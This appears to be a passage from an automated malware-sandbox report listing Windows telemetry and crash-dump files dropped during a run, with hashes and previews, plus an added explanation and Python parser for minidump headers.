Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):87784
Entropy (8bit):3.0377325742320194
Encrypted:false
SSDEEP:1536:AT94/255DRSGPrDdJNqQT4mxslVbn+b+d+ZYd+O9jz3sE+:AT94/255DRSGPrDdJNqQT4mxslVbn+bL
MD5:C83FB41C1549FD269FEE0D39F4390AE7
SHA1:5C2F4AE788F858D8FEF7F1A77B613C2F8566C79F
SHA-256:41B1BBD490B02FA483F114F96F738F335C12EF2F6A3D8771F0C6498BB7A0BA05
SHA-512:E3A6197B72597D52D1DF43994C214558B6D3E45A42A87FB44CBDF65E87C78560FFA2C2E84BF673080A8E0D419D862F262836AA1464DF0D83469D3DDF953884D0
Malicious:false
Reputation:unknown
Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6852060819730696
Encrypted:false
SSDEEP:96:TiZYWVcWxpHtmfY1YHHWUhHaYEZWftFiP3TCdwEjkv6a5beMX0aIuX3:2ZDVcVfyQNXT7a5beMX0NuX3
MD5:FA0C800287C6B9A8881EF017E4D59D64
SHA1:9574460E777C18A5123A37484833857D474CA0FD
SHA-256:A4A19B5C5A94147A9767B9AF653235F0731BF1A3FCE2CB64D0D949CA3509FD9C
SHA-512:D22F47487E9759195BFC576C05832C9FBB931DDCD12856A0A9F5AA0DBA5F7B723469A8C6661E79ED7A8EDFB44B0067076D3D67FF12857DBE95BE4BC3F459845C
Malicious:false
Reputation:unknown
Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):101386
Entropy (8bit):3.037440456104789
Encrypted:false
SSDEEP:3072:mHfeTtH0FJpZ1yStaLgwk+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jWd+sXx:c
MD5:268B7451D22CDBA0AD7547BBEA6A076D
SHA1:42556CEBF4234F440E468AB68E1C92C69ED34876
SHA-256:B4680915629C1E40F48AA7BA0ABD21C022378EF8930DCA13AFDA07290D274F4E
SHA-512:28B160B579A5B958F10CC6A1A3FD5CED14A77DE02563B3D1B1E9A7D037896257777B0E3B303FF9E6E1BE9D50AE6169D39419FE81399CA28950194DCF3CA5D484
Malicious:false
Reputation:unknown
Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6981443441914474
Encrypted:false
SSDEEP:96:TiZYW3TLJ9grd6YkYvWBCfHpYEZXmtCijEvCZwEdNCaUM0MiSeI/AM:2ZD3CYTCDMPCaUM0MiSp/AM
MD5:DCD77C520E33E889CD5041578231D7E5
SHA1:FA5D7B218F6E93DC3560825EB4E047EE99925DB2
SHA-256:7C2CD3C43CEB44FD0D6936D1F18852C924D0B151BB48910D4420D70E9F77E466
SHA-512:A809FCA9D3322F08FFEBDBB5DADA20DA81F333B8C2DA01A662D579D68AE478C41802288B73E31ED4B0747315F018D203700499B58474AD7BC7C231D28E02A825
Malicious:false
Reputation:unknown
Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 19:34:39 2024, 0x1205a4 type
Category:dropped
Size (bytes):261476
Entropy (8bit):1.4880005068748894
Encrypted:false
SSDEEP:384:C3+jdeNvK5vw76pyIkYcuDP2GFcTroMrtnwl1tu+mKJIgfzrpl2Em1t:i0CK5vwyyIekGrD9+XGOOEm1t
MD5:85BF0BABC88BD541574FE356A08DDC26
SHA1:255104E2E3D5B521600FEA5556C6005BAF41A747
SHA-256:E11BAA125E3A2198F22CDD1F80892508E02B4BC5222DAB9BA5292413CCDC7949
SHA-512:D6701C1D7FF97B5C5B442636B3EC9CC5236D142A4513E47396EE106CD8F8C95748B1ACB70A8C1351272E0D72FBB4B9FF455BCE6E3E8F6CF6AAA7B41DE7AFDBC8
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......O.(f............d...............x.......l...|(.......... ...........`.......8...........T............O..|............(...........*..............................................................................eJ......l+......GenuineIntel............T...........9.(f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 19:34:40 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2532994
                                                                                                                                                                                                                                        Entropy (8bit):1.974773785472376
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+4byVZSIYxtykkIN+j4+5pdTjww2lzwQ2MKMarkajq:+oAbqw6j2MKY2
                                                                                                                                                                                                                                        MD5:01BB9B37B8DBE89B336BFB0454E154C4
                                                                                                                                                                                                                                        SHA1:24ACC01833F929B9451A3D366B4F3B2191C314E2
                                                                                                                                                                                                                                        SHA-256:BEC3162DC4C78CC963236E88D0D7536CC7C83EC4E00FA3F6E86427C35CF2C09C
                                                                                                                                                                                                                                        SHA-512:91F3407A040DCE05725287F0B24C51E1FF774359E24F107CE744E0FE586F84E0BAB63268738DBEE868EA7802F713DD244F0D5E202416D7729A4EFCE8926F128A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......P.(f............d...........p...x.......l....(......................`.......8...........T...........p...............T)..........@+..............................................................................eJ.......+......GenuineIntel............T.......,...9.(f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6370
                                                                                                                                                                                                                                        Entropy (8bit):3.7267685387784604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ6u96JzRYilfFJjmqHpr089bO6sfOam:R6lXJJ6JzRY4fFJjm4OZfK
                                                                                                                                                                                                                                        MD5:3865225B6B879B75D22854F748F27AE7
                                                                                                                                                                                                                                        SHA1:59618BCAEFD6DAE5C5038797A7599ADAD3175BAD
                                                                                                                                                                                                                                        SHA-256:CC2D499EE74225C9EF2FB069C100B28360C1C56F1113AADB4FD22C45FB74008B
                                                                                                                                                                                                                                        SHA-512:742B2255F0C01C6E41F136228787EAC48AC1439EEBCC7C190ABD14467E7D9E25B66390F6120E54A5418389474884BF25414BE83F6B2567BF3BFC97E99C7F81B1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.4.<./.P.i.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4718
                                                                                                                                                                                                                                        Entropy (8bit):4.533940523016823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsqJg77aI9f0WpW8VYgYm8M4JR7LF8+q87cWX5ATin1fd:uIjf4I7Rt7V8J4e5y+pd
                                                                                                                                                                                                                                        MD5:7F479D7CE41C5359997BDBBB271119EE
                                                                                                                                                                                                                                        SHA1:1DC4ABDB30DE0CB23212B7CC9B3E392E611A822E
                                                                                                                                                                                                                                        SHA-256:7846237641570981365CAFA186DBCF830CDC3F2ADDECB1CD7C947DB133582501
                                                                                                                                                                                                                                        SHA-512:D7A310CB6BB09E343677BC85E3CA281E32291725BCB91243B6736FB70EB767969C46BAFA3914CA401BB1FCC070E3DA9279135F7E3BF1F30710DEAF85574FC3AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
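The "File Type" line on the two WerFault.exe minidumps above is libmagic reading the 32-byte MINIDUMP_HEADER at the start of each file: the stream count, the TimeDateStamp, and the Flags field, which is the MINIDUMP_TYPE mask the report shows as "0x1205a4 type". The timestamp is printed as UTC; the bytes "O.(f" at offset 20 of the first preview are 4F 0D 28 66, i.e. 0x66280D4F, which is 2024-04-23 19:34:39 UTC, matching the line. Because WerFault.exe ran from SysWOW64, the process that crashed was 32-bit, which is also why the SystemInfo stream carries the "GenuineIntel" vendor string visible in the preview. The parser below is an added example and is not code from Joe Sandbox or from the sample: it validates the header, names the flag bits, walks the stream directory with a bounds check (a dump produced during a malware run is untrusted input, so a directory entry must not be allowed to index past the end of the file), and pulls the OS build, CPU vendor and build-lab string out of the SystemInfo stream. The struct layouts are the MINIDUMP_HEADER, MINIDUMP_DIRECTORY and MINIDUMP_SYSTEM_INFO definitions from dbghelp.h as I know them; the dump it parses is constructed in build_sample() with the timestamp and flag mask of the first dump above and is not one of the dropped files.

```python
"""Minimal minidump header / directory / SystemInfo parser (added example, not from the report)."""
import struct
from datetime import datetime, timezone

HEADER = struct.Struct("<4sHHIIIIQ")      # Signature, Version, ImplVersion, NumberOfStreams,
                                          # StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIRENT = struct.Struct("<III")            # StreamType, Location.DataSize, Location.Rva
SYSINFO = struct.Struct("<HHHBBIIIIIHH")  # MINIDUMP_SYSTEM_INFO up to Reserved2; 24-byte Cpu union follows
SYSTEM_INFO_STREAM = 7
ARCH_INTEL_X86 = 0                        # PROCESSOR_ARCHITECTURE_INTEL

# MINIDUMP_TYPE bits, low to high, as listed in dbghelp.h; bit i => "MiniDump" + name
_FLAG_NAMES = [
    "WithDataSegs", "WithFullMemory", "WithHandleData", "FilterMemory",
    "ScanMemory", "WithUnloadedModules", "WithIndirectlyReferencedMemory",
    "FilterModulePaths", "WithProcessThreadData", "WithPrivateReadWriteMemory",
    "WithoutOptionalData", "WithFullMemoryInfo", "WithThreadInfo", "WithCodeSegs",
    "WithoutAuxiliaryState", "WithFullAuxiliaryState", "WithPrivateWriteCopyMemory",
    "IgnoreInaccessibleMemory", "WithTokenInformation", "WithModuleHeaders",
    "FilterTriage", "WithAvxXStateContext", "WithIptTrace",
    "ScanInaccessiblePartialPages",
]


def decode_flags(flags):
    """Expand the MINIDUMP_TYPE mask (the '0x... type' value libmagic prints) into names."""
    return ["MiniDump" + n for i, n in enumerate(_FLAG_NAMES) if flags & (1 << i)]


def read_minidump_string(buf, rva):
    """MINIDUMP_STRING: ULONG32 byte length (terminator excluded) followed by UTF-16LE text."""
    (nbytes,) = struct.unpack_from("<I", buf, rva)
    return buf[rva + 4:rva + 4 + nbytes].decode("utf-16-le")


def parse_minidump(buf):
    sig, version, _impl, nstreams, dir_rva, _cksum, ts, flags = HEADER.unpack_from(buf, 0)
    if sig != b"MDMP" or version != 0xA093:          # MINIDUMP_SIGNATURE / MINIDUMP_VERSION
        raise ValueError("not a minidump")
    info = {
        "streams": nstreams,
        "time_utc": datetime.fromtimestamp(ts, tz=timezone.utc),
        "flags": flags,
        "flag_names": decode_flags(flags),
        "stream_types": [],
    }
    for i in range(nstreams):
        stype, size, rva = DIRENT.unpack_from(buf, dir_rva + i * DIRENT.size)
        if rva + size > len(buf):                     # truncated or hostile file: refuse rather than read past EOF
            raise ValueError(f"stream type {stype} at {rva:#x} (+{size}) runs past end of file")
        info["stream_types"].append(stype)
        if stype == SYSTEM_INFO_STREAM:
            (arch, _lvl, _rev, ncpu, ptype, major, minor, build,
             _platid, csd_rva, _suite, _r2) = SYSINFO.unpack_from(buf, rva)
            info["arch"] = arch
            info["cpus"] = ncpu
            info["product_type"] = ptype              # 1 = VER_NT_WORKSTATION
            info["os"] = f"{major}.{minor}.{build}"
            info["build_lab"] = read_minidump_string(buf, csd_rva)
            if arch == ARCH_INTEL_X86:                # Cpu union is X86CpuInfo; VendorId[3] comes first
                cpu = rva + SYSINFO.size
                info["cpu_vendor"] = buf[cpu:cpu + 12].decode("ascii")
    return info


def build_sample():
    """Constructed 32-bit minidump with a single SystemInfo stream (illustrative values, not a real dump)."""
    lab = "19041.1.amd64fre.vb_release.191206-1406".encode("utf-16-le")
    sysinfo_rva = HEADER.size + DIRENT.size                 # directory holds one entry
    csd_rva = sysinfo_rva + SYSINFO.size + 24               # string placed right after the stream
    header = HEADER.pack(b"MDMP", 0xA093, 0, 1, HEADER.size, 0, 0x66280D4F, 0x1205A4)
    directory = DIRENT.pack(SYSTEM_INFO_STREAM, SYSINFO.size + 24, sysinfo_rva)
    sysinfo = SYSINFO.pack(ARCH_INTEL_X86, 6, 0x9E0D, 4, 1, 10, 0, 19041, 2, csd_rva, 0x100, 0)
    cpu = b"GenuineIntel" + bytes(12)
    csd = struct.pack("<I", len(lab)) + lab + b"\x00\x00"
    return header + directory + sysinfo + cpu + csd


if __name__ == "__main__":
    for key, value in parse_minidump(build_sample()).items():
        print(f"{key:13} {value}")
```

On a real dump from the report, call parse_minidump(open(path, "rb").read()) and compare the "streams" and "flags" values with the File Type line before loading the file into a debugger; 0x1205a4 decodes to a filtered triage dump (FilterTriage, WithoutOptionalData, FilterModulePaths, WithHandleData, WithUnloadedModules, WithProcessThreadData, IgnoreInaccessibleMemory), so expect thread context and handle data but not a full memory image.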
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):90260
                                                                                                                                                                                                                                        Entropy (8bit):3.0354213561783867
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:eWntMm7KDB+JPoG5q7T4aFkcHdn+b+d+ZYd++15zognUx:eWntMm7KDB+JPoG5q7T4aFkcHdn+b+d+
                                                                                                                                                                                                                                        MD5:F529130BED2DB0B7A7FFFA773152C056
                                                                                                                                                                                                                                        SHA1:2890F9EF247C67C973DDE077CE353ACE16C269F6
                                                                                                                                                                                                                                        SHA-256:E9F81A0A6C93F278FFB9AF8CF3069D16485B44930AE8B57A31D9F0978E54D85E
                                                                                                                                                                                                                                        SHA-512:74F43E3F7FE11BAF84A2764309C2D5A4EE862113E2F1156B98802D1BDE7597DABCB8DB0DA33D2C0776C9050F71440B721A2E25FC0F59F76149053B302375F0F0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6862727063004974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYW8oHvxm/YIYPGWzHPYEZjHtFi93oCmwpSo7ygd4ZaQyWMd3xCI3U3:2ZD8JPQlho5UaQyWM9xl3U3
                                                                                                                                                                                                                                        MD5:D7C9080A6EBE4593C9DC5BF292A4795E
                                                                                                                                                                                                                                        SHA1:412800D065B9E5B22082EBD26DFCB27E91D35C12
                                                                                                                                                                                                                                        SHA-256:9BF5E21CAF3D502713855E7435FA16E6532F16E9E1B59CF0B0033BB1AE0DF9CA
                                                                                                                                                                                                                                        SHA-512:4B81DEC749AAAFA052C730C008C81CFE7AC25B0223F1BE5F7282F25A1F94BB80A5FFEBD3BEB5C4F1E058F961D966A52D2E6EB8B71BBEE9C6578DD7DF279F07B2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
